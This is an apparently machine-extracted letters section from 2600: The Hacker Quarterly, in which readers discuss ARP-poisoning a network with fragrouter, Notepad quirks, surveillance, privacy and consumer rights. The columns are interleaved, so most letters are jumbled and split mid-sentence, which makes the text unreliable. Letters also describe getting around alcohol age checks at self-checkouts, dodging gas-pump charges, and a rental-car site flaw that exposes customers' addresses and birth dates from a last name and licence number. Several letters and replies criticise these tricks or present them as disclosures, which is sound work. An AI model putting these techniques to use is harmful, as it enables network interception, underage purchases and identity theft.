it began forwarding the DNS to the Internet properly: net. One of the best highlights of my HOPE experience actually came after the conference itself. like a good lemming. Furthermore. Simply put. Many people seem convinced their ability to affect their own lives in any way (let alone in a positive manner) is effectively null. or that you should never stop praying for someone to save you and start saving yourself seems pretty effective for most people. I was absolutely distraught. and thank you 2600. the government probably makes a piece of the profit for every converter box sold through a contract between them and the manufacturer. in 25:2.youtube.conf. in fact. You definitely have a new reader for life. Fast forward to January 11. Thinking the images had been cast into the digital abyss.all.04-LTS on a Dell Mini 9 netbook. After getting all of the tools loaded and resolving all of the library dependencies. Once the messages were gone. found at bugs. Dear 2600: After reading “Fun with Network Friends” by Uriah C. For more info.com/ watch?v=60AJ4Mi1kNc) once thought lost are now on the net. After taking many photos and videos. We went home and I hooked up the camera to my Windows box to extract the data. I verified that I could surf to IP addresses and webspy would detect and display those and I saw those in fragrouter. Ten minutes later.google. I went to a big-chain retailer to print out the images at their photo kiosk which unfortunately was out of order. then arp poisoned my targets. I decided to try out the tools featured in the article. On a personal note. After adding the following lines to /etc/sysctl. issuing coupons to offset the replacement costs for the conversion boxes (two $40 coupons per household). I settled down to have fun with my network friends.default. that is not true.
which. Then I launched webspy and firefox. Thanks again. I held down the “Enter” key to get rid of. The fact that they seem to have run out of allocated funds by the time this letter was composed and are putting people on a waiting list is a completely different matter. The government was. I launched fragrouter. In fragrouter I didn’t see any traffic but ICMP traffic. Upon doing so. when the user clicked links within pages. The result was the same.net/ ubuntu/+source/procps/+bug/84537. my wife.dtv2009. Back in October of 2007. it didn’t matter if my wireless card was in promiscuous mode or not.ipv4.com/PTCruisin/ ObamaAiken1007#5290135149281834562) and video (www. I got multiple messages about corrupt data.conf. and had a real blast at The Last HOPE (thank you all. when I showed up to work wearing a HOPE shirt and a 2600 cap .
Dear 2600: Concerning the letter in 25:4 from Unknown Unknown which said: “By the way. CJ Dear 2600: I sat with the intention of merely asking no one in particular if they’d noticed a trend in advertising. for making it possible). the target computer couldn’t surf the Internet! The DNS query kept timing out. so too were my images. I’m a recent convert to the hackerdom (now starting my second year of regularly buying 2600). I looked to the Internet Search Gods for the answer.” As far as I know. These are low quality shots from having to peer in through a cracked-open door before the fire marshal would let more of us in. However. it worked brilliantly. In addition to that. conf. with Ubuntu.launchpad.ipv4. Thanks for letting us know. First. 2009. the “Introduction to Forensic Data Recovery” (25:4) was especially useful. It was as though it was written especially for me. As a side note. Thank you Paradox. I had recovered snapshots of precious memories long thought gone. Finally.and was allowed to work on the company’s main server without anyone even saying a word. they did not always display and I did get an unexpected crash from webspy once. I found it in the form of bug 84537. visit www. I continued to use the memory card over the past 14 months. I read the short but detailed and interesting article (including the part about immediately ceasing use of the storage device . then one-year-old son. after spending a couple of hours troubleshooting. but that all went unnoticed by the target. everything was working as advertised.gov/.
I’ve credited Paradox and 2600 in my Picasa Album and YouTube videos for helping make them even possible. the user must prefix all of these commands with “sudo”. Encouraging the idea that to be different is bad (the debate about what defines “different” or “bad” is totally beyond the scope of this letter) or the idea that the bad things that happen to you are always someone else’s fault. I am running Ubuntu 8.forwarding Upon launching the tools again. A photo (picasaweb. And of course it didn’t work. Arethusa Dear 2600: I picked up my first copy of 2600 today. South Carolina to see the underdog candidate Barack Obama speak. Steven C Jackson It’s always good to hear an article has actually helped someone in the real world. For me. and I went to Aiken. Then I thought about an article I had just read in 25:4 called “Hack Thyself” and started thinking about an even more subtle form of manipulating people within the system/antisystem mentioned.

but you never will. So know thy enemy. only there will not be the available oil because.S. Most people aren’t even going to register it at first. John Doe of Lagos. But the more I thought about it. of course. with responses usually saying “get a life you paranoid fucks. but there is a more specific term for that activity: “pump and dump scams. and I don’t even have asthma. so it’s not your fault. I (and most others) am not talking about how bad it is now.” They are plentiful and obviously illegal. and then you get your info. but there probably isn’t any to get anyway. When you stare long into the abyss. pull a pump and dump. several billion dollars of tar sands development in Alberta. as an avid cyclist. I didn’t know. it is generally agreed that thanks to the drop in the price of oil. however. Go register any of my old free email addresses and get ready to be subjected to news of scores of penny stocks about to hit the roof. and the harder the start is to catch. the less you know. a whole great big whack of projects were terminated. as I just pointed out. the ultimate reason not to bother lowering the price of gas goes back to something
a number of projects that were planned have now been deep-sixed. “yes. even hostile. right through the dead of winter on my old steel frame. the pros of happiness do not outweigh the cons. Well. but the symptoms kept coming back. it will burst through the ceiling in an orgy of frenzied buying that will make the $146 USD/ barrel look cheap. so it is possible. This information is all delivered in a manner that pats you on the back and says. I live in Canada and make a seven kilometer one-way commute to my job in an office in downtown Toronto. Yes. First. nobody knew. and the exceptions are the targets of ever increasing efforts to sneak that mentality into their lives.unless you pay attention now. You’re greeted by a jaunty (in the drug company case) person. For example. this is absurd.to quit smoking.(or her?) self a few bucks at the pump. The long term consequences of that will be about as great as a Hummer H1 600 miles from the nearest gas station with nothing but fumes in the tank. chipper and full of energy. “It’s OK. federal budget deficit. demand will return to where it was. the more dangerous it seemed. they’ll start to think they didn’t know that either (even if they did). Canada are now on ice. In this case. Some intangible think tank has an epiphany. Turns out asthma doesn’t go away!” Now this was not a surprise to me. the happier you are (I’m generalizing here). you must rely on outside sources (like the friendly federal government) to inform you. gloomy looking people designed to mirror (again. you didn’t know. In fact. the harder the whole process is to stop.
There are exceptions. All the credit to them. At first I thought it was just absurd. you didn’t know. In fact. the harder the whole process is to stop. What I really want to go after is Isreal’s fundamental premise that the value of Exxon or Shell or any other petrochemical company affects the long term value of oil. I’m sure it’s difficult for most people (maybe even anyone) to imagine things like reeducation camps or mass brainwashing. We’re looking ahead. I imagine mirroring how you’re supposed to want to feel. though.” This indication that not only is information on any given subject not important or desirable. You can’t find it though. So oil won’t just spike. they say something like. but be careful. “I’d start out strong. You won’t even know it’s happening until it’s too late . Thanks to 2600 for doing what you do. The tactic I speak of seems to be trying to convince people that it’s normal (and even kind of fun) to be totally clueless about very significant decisions you make or about parts of your life. I point to a recent tactic of drug advertisers and PSAs. the better!” (Yes.and fail . you’re greeted by dour. and helping keep us out of the camps. circulating “inside information” in an effort to affect stock prices is social engineering. but then my will power would fade” and then you find out later in the ad that smoking is more than just a habit. the reason for oil’s price spike in the summer of 2008 had almost nothing to do with events in the Exxon boardroom. hell. “the more insanely overpriced gas is. this is only my perception) how you’re supposed to feel when you try . “I treated my asthma. In my example.) But more importantly. Dear 2600: Isreal obviously went to some length to save him. Anyone who ever learned anything can probably tell you. that and news of a Mr. With the PSA in my example. the abyss stares back. and it can’t possibly be as bad as you say” (though not always in so many words). 
but the recent plunge is even more speculative. but eventually they’ll hear it so much. It’s a nicotine addiction. (I love the world of business only there is a writer permitted to use terms like “a frenzied orgy. But to me. Vandy It’s what we do. the market spike was speculative. and so the disease spreads. But a few points are probably worth mentioning. Yes. Nigeria who wishes to involve me in some scam that will enrich me to the tune of the U. I’ve seen letters and articles about the subtle ways the “the man” is out to get people upset. Isreal should have invested more time in learning about peak oil and the enormous demand for fossil fuels by China and India. watch TV. and it won’t be you who finds it. or just plain dead. ignorance truly is bliss” and indeed. my thoughts are.

and might not be sent off-site. And. the second largest supermarket chain in the U. or maybe even creating a new card with a slightly altered birth date. page 41). or otherwise in the midst of a purchase. this is 2600.html). Or would that take too long? Using a barcode generator on a card’s number would probably work.com/2007/12/notepad-tricks. It was actually the “bush hid the facts” comment that tipped me off.” Dear 2600: While reading a letter from “Greggg” (25:4. Dear 2600: Thanks to Yimir for “Hacking for Beer” in 25:4. Beer is moderately more expensive than your fridgepack of 7 Up. I actually cheated and got the specifics of why it works from a search (ended up at this site: hungryhackers. every time you save it. I refuse to use the kiosks. These are what were shown in court: a zoomedin image of the person signing a credit card receipt. thus creating the potential for mass layoffs. The 18 8-bit characters are read as nine 16-bit (nine squares). One thing is certain. though. On my next stop at super-behemoth-mart after hearing about this. “Osama bin Laden called. And that is not hacking. and found that whenever people were accused of shoplifting.” and I believe should have kept this article from ever reaching the printing stage. offsite. and other details. And it would be interesting to see if the amount of shoplifting has gone down over the years as a result. or credit card fraud. One in particular caught my eye: “Hacking for Beer.) What I saw was a dedicated camera (in a smoked glass ball) ceiling-mounted over each and every cash register. as seen in the following letter. it will append a timestamp to the end of the text. After all. I like to think you’re a bit more intellectual than that. Video of the rest of the store probably isn’t retained as long. What will result when reopened are squares. From then on. five letter scheme). where it belongs. then save. three letter. swiping their debit card.blogspot. day/ time. 
But as far as prosecuting any illegal activity at the register is concerned. Since they weigh the same. But this is about the article itself. I anxiously awaited my new issue (25:4). And please help keep articles on illegally discounting booze in some blog on the net. thus keeping a log.
I used to say to rude drivers when I would bike past them. (No. oftentimes the discussions that come about as a result of someone advocating such behavior can yield some interesting facts. These are not necessarily used together. That is just outright stealing. beware of the all-seeing eyes in the sky! Estragon The amount of surveillance these days in a typical supermarket is nothing short of astounding. I hope people in the industry can tell us more about those uses. if not years. Another trick I found was that you open a text doc. Unfortunately. I was reminded of the trick in Notepad I had found online a while back. We can imagine biometric identification methods used by law enforcement to track people. My problem lies under “The Hack. or similar infractions in the supermarket.” Two of my favorite things.LOG” and hit enter. then save. but it is read as 16-bit UNICODE.
and all kinds of other nefarious stuff (as envisioned in “Business Intelligence” in the same issue). in which supermarket loyalty cards are used to bypass age screening for alcohol purchases.S. My guess is that the register transactions are warehoused for at least months. then save the barcode to stick on a 12 pack of beer. using someone else’s number (many stores have taken to using your telephone number as your card number) if you can enter it manually. I don’t know how long these records are kept. and the “self-checkout” kiosks (gaining some popularity). had the honor of serving on a grand jury where we live. amount of transaction. One that could easily be exploited simply by giving the club card to a friend. We suspect it hasn’t. beer is not soda. The article gets into the whole “club card” discount system (employed at most all grocery chains). I looked up. My advice to anyone considering fooling the supermarkets like this is: look up! My S. the young reader with grammar and spelling problems. For those who found it hard to follow. This constant monitoring is something we’re getting used to which will forever be seen as “normal. Still images of register transactions are tagged with the person who made the transaction.O. he was talking about this: create a new text document. since the face was visible (though from overhead). three letter. as is my usual routine. the supermarket was able to provide total video surveillance of all transactions to the prosecutors. They also have one or two cameras in every aisle in the store. Yimir suggests that people buy a 12 pack of soda. I think he wants his oil back. You are saving the document in 8-bit extended ASCII. How funny.” Michael Dear 2600: As always. It may have been a clever discovery. as corporations use them to decrease the need for actual tellers. it should work. gHOst_Guard While we agree that stealing is wrong and make every effort to discourage people from doing such things. 
though they have a similar setup. type “. I quickly got to reading the shorter articles first. and shouldn’t be confused that way. Type in something like “bush hid the facts” or “this app can break” (or anything that follows this four letter. not WalMart. as long as you get away with it. My local place is owned by Kroger. I think Yimir needs to quit trying to convince himself and others that stealing is OK. The cameras are angled somehow.

I know a great deal of readers glaze over when politics are covered. I’ve heard the blacklist stories and am wary to subscribe.
Only through open discussion and constant sharing of information will we continue to figure things out and devise ways of making them better. This article explains that hacking isn’t limited to areas with high technology. Windows’ (despicable lack of) security. that the pioneers of hacking. the feeling I had was very important. Something didn’t sit well with me. Perhaps if the article was written with a little modesty. We hope to see more people reach out and meet others who share their interests without worrying about the ramifications. Like I said. and a tactician is now in place. We haven’t already heard of all the great names in hacking. an essential curiosity deeply ingrained in our genetic fiber. Every three months. Craigslist post flagging. I hope to share my experience with you next time. psychological aspects of the hacker mindset. it’s also a wonderfully rounded issue that covers all aspects of the hacker mindset. This can prove to be a blessing or a curse. this time in Swiss form. Hack the political system. He had a whole letter complaining about the “Thirteen Years of Starting a Hacker Scene. but perhaps making a collaboration of silly things like this would make a nice. It is this hope for knowledge and clarity that will forever live on. I didn’t really care for it myself. I thought maybe a page was missing from my copy.
I don’t know if it would be cheating. Either way. (I’m not even going to bother getting worked up over the appointments he’s already made. but. the story ended with an eagerness to discover what could be. it would have been easier to take in. Thank you for all the work you do to stoke the flames of creativity. The rest of the issue covered a lot of topics that even the most basic-level user has encountered. buffing the admin’s ego in the process. The reign of the iron-fisted cowboy is over. However. I’m not trying to dismiss the author completely. It is a new dawn. Well. to start. along with some hacker insight for the uninitiated. our protagonist was still willing to dare himself to see a successful outcome. 2600 is the most underrated social commentary of the (dis)Information Age. But. Even if the attempted hack had failed. Lost files (and the recovery thereof). This issue covered all the bases. From the beginning we’ve been trying to reduce the amount of fear that is felt in this community and a great deal of progress has been made. light article. lest a new Patriot Act slip through Congress. however. social engineering. awaiting the next release of what has become my favorite publication (and sometimes skipping work to read it). It seemed as if Derneval Ribeiro Rodrigues da Cunha (calling him just “da Cunha” didn’t look right typed) was just trying to get his name out there. But. pernicious obfuscation. above all others. I admit I felt many of the same feelings that the writer of the letter did. I visit the same magazine vendor every day for weeks. not as an avid reader. but a new contributor. Shocked998 Dear 2600: Not only is 25:4 a fun time signature to use when playing music. and did so in a way that even the script-illiterate could figure out what was being said. the people who instigate critical thinking.) We must closely watch those in power while they get accustomed to handling such a responsibility. I was annoyed that Mr. 
like the readers of the magazine. as I believe it helped me form a connection to the author. and you can reshape the world we live in. Wrenshall didn’t continue the story. perhaps explaining further exploits to get the information he really wanted and to find out how his paper-hacking was foiled. for once I think it’s finally time to attend my first local meeting. Always keep learning! ZANAC Thanks for writing. We all should know that 2600 doesn’t use articles like this to “filler up” the pages.” which in turn was a whole article of complaining too. But. the message and hacker spirit is never compromised.” same issue and page. as commented on by the 2600 staff. I wasn’t sure whether the stories were inflated or even fabricated. I assumed the teacher had already played matchmaker and the forms were just a ruse. I do think. should be given some recognition. I don’t know how to take that article. as well as letters and letters and letters and letters from all over the world and written by people with various levels of freedom. depending on the side he chooses to take. it has the most important and wide-reaching effect on this community. It is only through knowledge that we can gain the power to effect change. From “Beginnings. I finished “Conspiracy” feeling unfulfilled. Like many other readers.” a reflection of the current political climate. and there will be people who disagree with you. you will never always agree with everyone. stepping away from the interesting app stuff. We should be very attentive to our new president’s first moves in office. and I admire the dedication you have to keeping it in circulation and the dedication your readers have to breaking down the illusions of secrecy and finding out what some people are too scared to admit to doing with our personal information. and my personal favorite: the Adrenaline rush. I also have a comment about “PMD. and it took little time to figure out what it was. 
through to the closing statement of “Conspiracy” by Peter Wrenshall. There are still plenty of people who can contribute to the community. no matter how many forces attempt to distract us all from it (often successfully). which I suspect his area wasn’t.

If anyone would like me to write it up. I believe it is more likely that they chose a default-allow to make sure their clients are able to get online and have a good user experience if they run into troubles versus having to contact tech support which then has to have training and be responsive potentially 24x7. I could write up an article on how to get started hacking. however. I hope to one day have something neat to contribute. and I will be picking up the new issue shortly. Since I only started reading 2600 back in 2005. So again. If yes. thinkt4nk That would be telling. and I’ve wondered what goes on with the power lines from the perspective The Prophet gave in his article. The address is articles@2600. We’re always open to suggestion on what we should be doing and how we can do it better. Dear 2600: I wanted to share an amusing story with you that happened when purchasing The Best of 2600 last fall. the owner of the electrocuted dog had to watch. and Facebook. I would like to play devil’s advocate in that the default-allow was actually a choice by design and not a mistake or oversight.. This is the result of a crumbling infrastructure in sore need of constant maintenance. I am an avid reader of 2600. Books such as these get my mind into the hacking mode. this is a great book and I’ve thoroughly enjoyed reading it. but I just wanted to let The Prophet know how much I appreciated his piece in 25:4. In New York. If a place as fancy as Dubai were actually attempting to rely on their hotel Internet connection sales for income. helplessly. Let me know if your website can survive massive amounts of hits from sites like Digg. Last fall.
Dear 2600: I read the message from the guy about the Art Bell Show that went off the air for a half hour. com/r/hackers. the author implies several times that the payment bypass technique used is due to the design flaw of a default-allow mindset for the payment page. I just read The Best of 2600. and perhaps you might consider writing a follow-up? Pampaluz This has been a recurring problem in the streets of New York and it’s even claimed the life of a human who was trying to save her dog from electrocution..com. but cannot fix them fast enough. here are two links: www. with nothing he could do.payphone-directory. while his dog died horribly right in front of him. Hacking is a lifestyle. Reddit. If you are the person whose dog died after a week. I submit URLs like a monkey to reddit. not a passing phase.. it’s awesome to get caught up on the history of the hacker scene and what it’s all about. then feel free to respond. but until then. The current one seems antiquated. We appreciate the enthusiasm. Pulling the leash only dragged the dog over the spot that finally killed it. then you should not waste your time. Being a network analyst. Dear 2600: In the article written by forgotten247 about bypassing the payment and proxy filter in Dubai. As a side note. Dear 2600: First of all I would like to thank 2600 for publishing this letter. thanks for writing this article. but it would look something like how to learn to program in ten years. I walked into my local Chapters store
Random Offer
Stories
Anyway. they would not have a default-allow posture. I would love to see you build a website that focuses more on reader contribution.payphone-project. Ben Edwards Two dead dog references in two letters . Maybe there’s more! bogaty Dear 2600: I doubt that this letter is publishable. I am getting tired of people asking how to hack their school’s server or how to learn to hack. since it is so dependent on the client web browser which is certainly a major design flaw. the city is aware of these problems. Please tell me that it was a deliberate reference to Vonnegut’s Slaughterhouse-Five. The dog’s owner could do nothing legally. jus Dear 2600: In response to Mario Chiesa’s letter in 25:4 regarding a directory for public payphones. As a dog owner. Lawsuits have been filed against both the city and Con Edison. And you can’t sue. I’ve thought a lot about this. Thank you very much for answering so many of my questions at once in your “Telecom Informer” column.org and www. I have read of a dog that was electrocuted by walking onto an ice slick that was “hot” due to old. and I was delighted to see the sentence. Your statement that nothing can be done legally is untrue.com. “And so it goes” in your response.

I have subscribed to [or purchased] 2600 for years. I feel rather strongly about this. We hope it works out. It was called ID Tech.. [we have] subscribed to 2600 The Hacker Quarterly. you are buying a hacker book. At the checkout. Everyone” stickers onto the automated checkout machine. Dear 2600: In the Winter issue. you don’t need a camp to find hackers in your area. “You’re not planning on doing anything illegal are you?” So I asked. last summer was one of the greatest years. but abandoning the thinking that made most information security professionals what they are today. I stopped to pick up a copy before I had even gotten home from camp. It will open your eyes to the types of things that are possible. Dear 2600: I want to tell you how I found 2600 because I sure as hell wasn’t looking for good reading material at Barnes & Noble.D. It is a voice for people. I got the following email (edited to remove identifying information): “In the past. Dropping our subscription. I can’t afford to go any longer but on my last year I took back one last bit of great knowledge: 2600. I guess the only ones we know about are the ones who get caught. Trusty Google returned your website as the top search as well as other listings referencing 2600 directly or indirectly.” I tried to tell her it’s not about stealing credit cards and crashing computers but about freedom of information and making things more secure among other things. I think 2600 is one of the best information security publications available and we should keep up the subscription.” To which I responded: “Please do not unsubscribe from 2600 .
to buy the book.. I have now learned the story of John Draper by heart and am a subscriber to your magazine. Sadly. there is a tech camp that I used to go to every year and it really has shaped a lot of who I am. they already block 2600. people. Dear 2600: I did a Google search to find your website and check the release date of the next issue. after she handed me the book she looked at me.” That’s when I told her how hackers get a bad rap and what you see in the media is not accurate. every spare moment I’d bug him so I could read it some more until I had read every word in it. I hope the company I work for will not unsubscribe from 2600. uncertainty.” Obviously.The Hacker Quarterly. Well anyway. “Hacker” initially meant someone who explores and tries to understand technology. both from the camp and from the kids I met there. After it was time for us to all go home. and said. George It’s funny to even think of this as a vulnerability when it’s such an obvious area of concern for any merchant. and doubt. as opposed to many information security magazines today which often seem to be only voices for corporations looking to hawk their wares using fear. From then on. Yimir submitted an article about using an automated checkout to get beer if you are underaged. Every person involved with information security and information risk management should read it. “What gave you that idea?” to which she responded “Well. One day when we walked in. I loved it there and I learned a lot. 2600 promotes and encourages people to actually think. we were all sitting in the chairs with wheels crowded around the laptop when my friend showed me this magazine that I had never heard of. usually by self-directed education. and then asked. IMHO. and processes. I loved going to a camp full of hackers my own age. I wonder if this vulnerability has been noticed elsewhere. repeated the title with some skepticism. research. given the important job we ask our information security professionals? 
Please do not unsubscribe from 2600 . 2600 started long before the media got its hooks into the word “hacker” and turned it into the bad label it is today. “Yes Ma’am. Then she replied. I went to Tops (my neighborhood supermarket) the other day and noticed that they had changed their checkout system and it will have you wait for an employee to come get identification from you. Thanks for printing a great book and fantastic magazine! Andrew Dear 2600: Recently. and that’s bad enough!
Rman665+1 Thanks for speaking up for us. My roommate and I would always go to a friend’s room to watch Red Dwarf way past “lights out” every night. Fortunately though. “You be sure to stay out of trouble!” I smiled and replied. and experiments.” I guess it always has been and always will be up to us to change the perception of hackers to the common person. “Well. (Previously the system was vulnerable to the trick in the last issue. Ampix0 We just hope it’s not because you spontaneously bought all of our back issues and t-shirts that you no longer have the money to go to camp. In New York. com. I became close friends with a few other kids during the weeks we were there. Can we afford that. smiled. I was greeted by a sales clerk who looked at the book. would be the equivalent of saving $24 per year.) They also slapped some new “We I. What fascinated me was that the fourth search result returned by Google was the link for the Democratic People’s Repub-
and why the hacker ethos is important. The Hacker Quarterly. However. I would like to know whether you feel this publication is valuable enough to continue subscribing to or not.

and a book on my website: http//www.” I look down at the glossy flyer with the corporate logo I faintly recall from all the bulletin boards around the joint. Now. Here. You can always stick a password onto your router so that only people you know can use your connection. It basically comes down to what we believe is right and wrong. but I was wondering if you would care to draw out and expand on when one is contributing to security in general.html. Dear 2600: I would like to inform your readers of something I just found myself involved in. and when one is just stealing or throwing bricks through windows. it’s seen as okay. And yet. I recently got a letter in the mail informing me that I was downloading games illegally and I should stop before my Internet service is canceled and I am prosecuted. subspacefield.org/security. when it comes to bypassing access controls on programs. then it becomes
Remarks
or pre-generating all valid SSH keys for Debian systems with the OpenSSL PRNG vulnerability. after all. Peter Wrenshall We’re happy to be of service in the furthering of hacker-related literature. as well as many very technical ones.jpay. I think it’s cool that a Google search for 2600 returns 2600-related items as well as something like North Korea’s website.org/security/security_concepts. there was a time when you could hit cancel on gasoline pumps after pumping your gas and not be charged. Dear 2600: I just picked up this quarter’s issue. The point of the story is I’m no hacker.com Anonymous This is an interesting site that allows you to do all sorts of things from transferring money to making restitution to sending letters to inmates. It has motivated me to start writing a new novel. They can use my wireless without having access to my personal pics or the computers on my network. so to speak. there seems to be a different prevailing attitude. There once was a time when I thought that was “fair play. Travis H. and says “here you go. digital same day deposits.. I read on. if it can be done. My cellmate happens to be unintentionally computer illiterate and he asked me. Doing so is not proving anything about the security.. We’d also like to hear if this site is helping prisoners or taking advantage of them. “Serving over one million inmates.subspacefield. we all know about the brick vulnerability. in my free “Security Concepts” book: http://www.
lic of Korea.. and just recently became a lifetime subscriber. smiles. Simple money transfer alternatives. My Internet was set up to have an access point for people to use when they come over to hang out. and they left a hole in the security of the system to anyone who was just pushing their buttons. Finally. We encourage aspiring writers to send their work to articles@2600. Anyway. “I wonder if someone could hack in and put money on my account. I’m sure there are some people reading your magazine that are hacking or ripping games to their CPU using BitTorrent or some kind of p2p program. I’d like to invite your readers to come and take a look at the security articles. we are rather curious to know more about them. Just be aware: Big Brother is Watching You! Greg C. Dear 2600: So I am sitting in my cell the other day reading the latest issue (26:1) and in walks the unit counselor. We do have some more hacker fiction submitted by our readers for future issues. so many thanks. I found myself a bit confused by your reaction to certain events. Dear 2600: I’ve been a reader of your magazine for years. we have yet to hear of them. playing a game by the rules of the people who programmed the pump. When I started reading your magazine. if you’re being held captive by a lunatic and you do this to escape. However. I deal with some non-technical issues like this. presentations.. in certain cases. For example.com actually signed their threat with PGP.” I wonder. I’d be willing to bet many of your readers do not know where to draw boundaries. Social or technological vulnerabilities? What are we being exposed to here? Will the Jpay logo one day be the header of my parole papers? www. since this is the only company in town. I deal with some non-technical issues like this. your reaction (and mine) is that this is just stealing. Similarly. If there are vulnerabilities. or retrieving encryption keys from DVDs.
and would like to thank you for publishing my short story.. so to speak. carlos This no longer seems to be happening although we also noticed it at the time. just walk in to any participating Wal-Mart (read: Sam Walton Correctional facility grand opening soon!). Few could say that throwing a brick through a window is a constructive act. we all know that untempered glass windows have a brick vulnerability: throw the brick at the window and it goes through. He looks at me. I’m playing Devil’s Advocate here. although I love to learn about it and read about it. We wonder how many people wound up having their lives somehow altered by that.THE HACKER DIGEST . However. So.com. In particular. I soon learned what a mistake that can be. something exactly the opposite of what 2600 stands for. All that is allowed is access to the wireless web. The letter you received is extremely common.” You were. We thought it was interesting that the folks at copyright-compliance.” Huh!? More confused or intrigued than sold.

as well as prevents me from fixing my own cars. anybody who is able can make a “pass-through” device that can plug into any OBD 2 car.” This will mandate that all auto makers provide free access (public access) to all their codes and registry information for all their cars. so they can put it on whatever device they want. Dear 2600: Feel free to use the search on my 2600 index at http://2600.wrepp. However. you pay more and get less than you would buying the song on a CD. again it boils down to right and wrong. actions that defeat this mentality are by default a positive thing. these poor people are trying to do the right thing and buy this stuff legitimately. not the least of which is flashing the e-prom with an “updated” program that makes it get worse performance and worse gas mileage (all in the name of emissions standards). yet they get punished for this? The first company that gets a deal with the popular artists that allows them to sell people good quality unprotected music. Jeff Dear 2600: I’d like to request you include in your magazine a challenge for everyone to consider: Cracking the codes for the automotive OBD 2 proprietary data set. In essence. It’s a pretty sick joke. Dear 2600: I would say that the music CD is pretty much dead. However. Anyway. will be what truly kills the CD.org. That cuts out the “little guy” like me from being able to afford the diagnostic tools. The recording and entertainment industries have gotten such a bad reputation for their actions that almost anything people do in opposition to their policies is now thought of as a good thing. For 99 cents. Epp Thanks for doing this . I thought this was pretty classy. They run Trend Micro for their browsing security. William R. part.” Years ago. even when in other situations those same actions would be seen as bad. and auto design manufacturers so that only they (and nobody else) can produce and sell tools and parts to fix the cars. and yet it costs more to even buy the stupid thing? 
For crying out loud. obviously. Dear 2600: I found it quite interesting that recently they have classified your website as “Dangerous. you pay for your own blank CD (assuming you even put it on a CD). Chris H It’s amazing to see how consumers are taken advantage of in such a manner and how they’re the ones seen as being in the wrong if they defy these “rules. then we can begin to work together to put some simple and inexpensive tools in the market to fix our cars.
but with online music priced like this. I’ve got a ways to go but it’s getting there. the dealer has proven time and again that it is unreliable. such a thing would have been unthinkable.com/. Verified fraud page or threat source” here at my job for the State of Texas. More info on the bill you discussed can be found at http://www. I figure that if the smart guys out there can crack these codes. here are a couple more examples of how industry is pushing individuals to break their rules.righttorepair. In the meantime. The reason I am bringing this to your attention is because the auto makers have formed a monopoly and cartel with certain tool. Telling consumers that they’re not allowed to use the DVDs they bought on certain machines or expecting people to pay twice for the same thing is generally thought of as wrong. since it involves a degree of ingenuity as well as the joy of being the first to come up with it. unprotected format that doesn’t make them sign a license agreement for every song they download. where’s the point in having copy protection on music files that you let people burn onto an audio CD that has absolutely no copy protection? I think this 99 cents per song deal may be partially thanks to Apple. stealing and not a constructive act (unless you’re being held captive by a lunatic inside of a gas station and you do this to get enough gas to escape).
a positive action.it will prove a valuable asset to many when complete. restricted version of the same song as you would get on a CD. this plan has been in the works for many years now. That’s why it’s important to always reflect on the why and we’re glad to see you doing this. Figuring out how to bypass a gas pump is a triumph of sorts. I even sent them an email asking for an explanation of the categorization and have never gotten a response. for a reasonable price (less than 50 cents a song). in a popular standard lossless format. But actually using this method to get gas for free is. I am being prevented from owning and taking care of my own property. and that it even breaks my car in various ways. I am being forced to send it to the dealer to fix it. you get a copy protected. Thanks for entertaining my challenge. Insofar as bypassing access controls. Therefore. Why do they give so many government grants to the electricity producers who pollute the air and water with mercury and aren’t held accountable to high emissions standards? I hear through the grapevine that some small tool makers are trying to lobby Congress to get a law passed called “the right to repair act. There’s a definite danger here since people can easily get used to doing the wrong things for the right reasons and then eventually just forgetting about the reasons altogether. with no response or effect. and putting it in a usable format for everyone to use. That way. and download the information to their computer for analysis. The problem is that the music industry just can’t seem to accept this and realize that people want online music sales done in a standard.

all from their database. since a new search on the search page at alamo. address. To tell you the truth. Their perspective. This is the root of so many of the security problems we face today. date of birth. too. and date of birth. National’s page asks only for name and license number. National’s website does require a credit card number for a $1 authorization verification. I’m a person who lives in silence. This also opens the companies’ customer databases to the possibility of serious corruption. “The information!” There was something different this time. It smelled fresh from the printers. this is just another example of how virtually nonexistent strong privacy laws are in the United States. this feature did allow me to overwrite the information that these companies had about me and therefore protect my information and privacy to some degree. it pre-fills the registration form with name. I am writing a truth. Once in possession of the Emerald card. date of birth. 2600 is not the respected and feared organization anymore. Customer support at these companies say that there is no way to remove any customer information from their databases or to make them not searchable on the website. We need legislators to pass strong privacy protections similar to the laws in other countries. an organization once respected and even feared.com with the “old” last name and license number then returns no matches. but will return a match with only a correct last name and license number. license number. just love. the site will pull the correct date of birth from the customer database and populate the field with this information. This message. On the upside.) Dear 2600: Alamo and National Rental Car companies allow customers to sign up for their frequent renter programs at their websites: alamo.not from hackers but from companies that don’t take their customers’ personal information seriously enough to protect it sufficiently from all sorts of prying eyes. 
Like pages gathered in a book I realized what the black hat hackers and the respected security professionals told me was slowly becoming truth. phone number. a joke. but my own situation is not one to be trifled with. Then I realized something. since with only a last name and license number. and much love your way. even if you search with an incorrect date of birth and incorrect first name. If a customer has rented before. this distress call. is now. date of birth. but it does not use AVS (address verification system) to authenticate the billing house number and zip. writing this letter is taking a risk on my part. Anyways.
Thanks. I became humored with the objectives of hacking. A reason and a need to truly change. Unfortunately. since all of the information in the pre-filled registration fields can be changed. anyone can obtain the address. they could then make reservations under the customer’s name. (Candy not included in letter. Reading the magazine disappointed me. there is always a chuckle at the end of the sentence. Now. and frequent flyer numbers which have been previously used by the customer. “Hacking Beer” and “Hacking Thy Self”? I had a good laugh for a moment. National Car allows the customer to sign up for the “Emerald Club” program with this form. the risk is nothing for what I’m about to share with you. and driver’s license number. The ink gave a new shine and the paper felt brand new. Something odd. I found myself already knowing the information. is to all who read this. Obviously. Dear 2600: The reason I’m writing this letter is because what was once a well renowned hacker organization. “Finally!” I said to myself. I grew excited just holding it in my hands. I always try to comprehend the way others think when describing their point of view of the world. This apparently updates the companies’ main databases. they can search by name and driver’s license number to find their record. This isn’t the same 2600 I once knew. Walking through Borders last week.com and nationalcar. With Alamo. to many in the black hat and security world. I had to give in to my temptation and purchase the magazine. none none Thanks for so clearly pointing out where the true threat to our privacy lies . I’m writing this not to offend or “hate on” 2600. Not much for me to glean from. and then submitted. this is a huge security flaw. For the past year I have held back from buying a 2600 magazine. curious people asked what it was. Who I am? What gives me a right to say such
